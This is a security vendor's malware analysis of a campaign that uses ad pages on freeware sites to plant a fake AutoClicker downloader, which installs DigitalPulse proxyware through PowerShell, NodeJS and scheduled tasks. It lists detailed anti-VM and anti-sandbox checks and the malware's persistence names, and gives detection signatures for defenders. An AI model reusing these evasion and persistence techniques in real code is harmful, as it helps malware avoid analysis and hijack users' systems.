DigitalPulse Proxyware Being Distributed Through Ad Pages
AhnLab SEcurity intelligence Center (ASEC) has recently confirmed that proxyware is being installed through advertisement pages of freeware software sites. The proxyware that is ultimately installed is signed with a Netlink Connect certificate, but according to the AhnLab analysis, it is identical to the DigitalPulse proxyware that was abused in past Proxyjacking attack campaigns. While installing legitimate programs, users may install a disguised program called AutoClicker through ad pages and ultimately have their network bandwidth involuntarily hijacked by the installed proxyware.
1. Proxyjacking
Proxyjacking involves the unauthorized installation of proxyware on infected systems, which allows threat actors to share a portion of the system’s Internet bandwidth with external sources for financial gain. Proxyware is a program that shares a part of the Internet bandwidth that is currently available on a system to others. Users who install the program are usually paid with a certain amount of cash in exchange for providing the bandwidth. If the threat actor secretly installs proxyware to the infected system without the user’s consent, the infected system involuntarily has its bandwidth stolen and the profit is redirected to the threat actor. This is similar to cryptojacking attacks, but CoinMiners are installed instead of proxyware to mine cryptocurrencies with the infected system’s resources.
Proxyjacking is being reported not only by the ASEC Blog but also by several other security companies. The proxyware strains abused in proxyjacking cases include IPRoyal, Peer2Profit [1], Traffmonetizer, Proxyrack, and PacketStream [2]. In 2023, LevelBlue introduced a proxyjacking attack campaign that installs proxyware named DigitalPulse, which is reported to have infected at least 400,000 Windows systems. [3]
In the recently identified proxyjacking attack, DigitalPulse was also abused: the difference compared to the past cases is that the proxyware is signed with the name Netlink Connect, but other characteristics are the same.
2. Distribution Through Ad Pages
In the current attack case, the malware was installed via the homepage of a certain YouTube downloader program (freeware). After initially accessing a download page shown below, clicking on the webpage pops up an advertisement page. This page randomly redirects to various PUP, malware, or ad pages.
Figure 1. A freeware webpage used to distribute malware
The malware was downloaded from a download page. Additionally, the webpage can redirect to a page distributing LummaC2 (see Figure 2).
Figure 2. Pop-up pages distributing the malware
As mentioned in an ASEC Blog post, LummaC2 uses a phishing technique that stores a malware download command in the clipboard and prompts the user to execute it. [4] Only the content related to CAPTCHA is visible in the “Run” window, but as shown below, it is actually a command that uses mshta to download and execute the malicious JavaScript from an external source. While the malware was distributed as an email attachment in a previous case, it is now distributed through ad pages.
Figure 3. The command to install LummaC2 saved in the clipboard
3. Malware Analysis
If the user does not make any checks and executes the file downloaded from an ad page mentioned above, proxyware is ultimately installed on the system without user knowledge.
Figure 4. Malware installation flowchart
3.1. Analysis Disruption Techniques
The initially distributed file installs AutoClicker, which is disguised as a GUI program providing an auto-click feature during installation (see Figure 5).
Figure 5. The initially distributed file and execution result
However, “AutoClicker.exe” is actually a downloader malware strain with a routine inserted to download proxyware. AutoClicker encrypts the strings it uses and disguises function names for legitimate purposes.
Figure 6. Encrypted strings and function names disguised for legitimate purposes
Additionally, it first uses various anti-VM and anti-Sandbox techniques upon execution to check if the current environment is an analysis environment.
| Analysis disruption technique | Target |
|---|---|
| Check the loaded DLLs | sbieDll.dll(Sandboxie), cmdvrt32.dll / cmdvrt64.dll (Comodo Antivirus), SxIn.dll (360 Total Security), cuckoomon.dll (Cuckoo Sandbox) |
| Check Sleep bypass | |
| Check Wine | Support status of the wine_get_unix_file_name() function in kernel32.dll |
| Check firmware | “Select * from Win32_ComputerSystem” / Manufacturer & Model / “microsoft corporation” & “VIRTUAL” (Hyper-V) “Select * from Win32_ComputerSystem” / Manufacturer / “vmware” (VMware) |
| Check files | “balloon.sys”, “netkvm.sys”, “vioinput”, “viofs.sys”, “vioser.sys” (KVM) “VBoxMouse.sys”, “VBoxGuest.sys”, “VBoxSF.sys”, “VBoxVideo.sys”, “vmmouse.sys”, “vboxogl.dll” (VirtualBox) |
| Check services | “vboxservice”, “VGAuthService”, “vmusrvc”, “qemu-ga” |
| Check port support status | “SELECT * FROM Win32_PortConnector” |
| Check named pipes | “\\\\.\\pipe\\cuckoo”, “\\\\.\\HGFS”, “\\\\.\\vmci”, “\\\\.\\VBoxMiniRdrDN”, “\\\\.\\VBoxGuest”, “\\\\.\\pipe\\VBoxMiniRdDN”, “\\\\.\\VBoxTrayIPC”, “\\\\.\\pipe\\VBoxTrayIPC” |
| Check process names | “Procmon64”, “procexp64”, “x64dbg”, “x64dbg-unsigned”, “x32dbg”, “x32dbg-unsigned” |
| Check web browser history files | Chromium-based (0.5MB or more), Mozilla Firefox (5.5MB or more) |
Table 1. Analysis disruption techniques
Among various analysis disruption techniques, the most notable part is that it checks the web browser’s history file and prevents the malicious routine from executing if the history file is below a certain size. For Chromium-based web browsers or Internet Explorer, the size threshold for checking is 0.5 MB, and for Mozilla Firefox, it is 5.5 MB.
Figure 7. Checking the size of the web browser history file
3.2. Installing Proxyware
Once the process is completed, AutoClicker creates and executes a PowerShell script at the path “%TEMP%\t.ps1”. The script is responsible for installing NodeJS as well as downloading malicious JavaScript and registering it in the Task Scheduler (see Figure 8).
Figure 8. A PowerShell script responsible for the downloader function
The task registered under the name “FastDiskCleanup” is responsible for executing the JavaScript malware downloaded using NodeJS.
Figure 9. A task registered under the name FastDiskCleanup
When JavaScript is executed through NodeJS, it connects to a C&C server and sends basic system information. Later, it executes additional commands based on the response. The downloaded response is a PowerShell command that ultimately installs proxyware.
Figure 10. Data structure transmitted to the C&C server
The PowerShell command downloads proxyware from GitHub to a path such as “C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Performance\NTService.exe” and registers it in the Task Scheduler under the name “Network Performance”.
Figure 11. A routine for installing proxyware
The proxyware ultimately installed is DigitalPulse, which also appeared in the past attack cases. The binary itself is practically the same, but the difference is that it is signed with a certificate named “Netlink Connect” this time.
4. Conclusion
DigitalPulse has been recently distributed through advertisement pages of freeware software sites. This proxyware is known to have infected at least 400,000 Windows systems through past proxyjacking campaigns, and in the recently confirmed case, the same proxyware was used although the certificate was different. Proxyware malware strains are similar to CoinMiners in that they gain profit by utilizing the system’s resources.
Users should be cautious about installing executable files from suspicious websites like advertisements, pop-ups, or file-sharing sites that are not official sources. Additionally, for systems that are already infected, it is important to install V3 products to prevent further malware infections.
File Detection
Trojan/Win.Proxyware.R645077 (2024.12.02.03)
Trojan/Win.FSAutcik.R684719 (2024.12.13.03)
Dropper/Win.Proxyware.C5701827 (2024.12.02.03)
Downloader/Win.Proxyware.C5701829 (2024.12.02.03)
Dropper/Win.Proxyware.C5701832 (2024.12.02.03)
Dropper/Win.Proxyware.C5715070 (2025.01.08.03)
Downloader/PowerShell.Agent.SC207034 (2024.12.02.03)
Downloader/PowerShell.Agent.SC207005 (2024.12.02.02)
Downloader/JS.Agent.SC207031 (2024.12.02.03)
Downloader/PowerShell.Agent.SC222234 (2025.01.09.00)
Downloader/PowerShell.Agent.SC222235 (2025.01.09.00)
Downloader/PowerShell.Agent.SC222236 (2025.01.09.00)
Behavior Detection
Execution/MDP.Powershell.M2514
Gain access to related IOCs and detailed analysis by subscribing to AhnLab TIP. For subscription details, click the banner below.
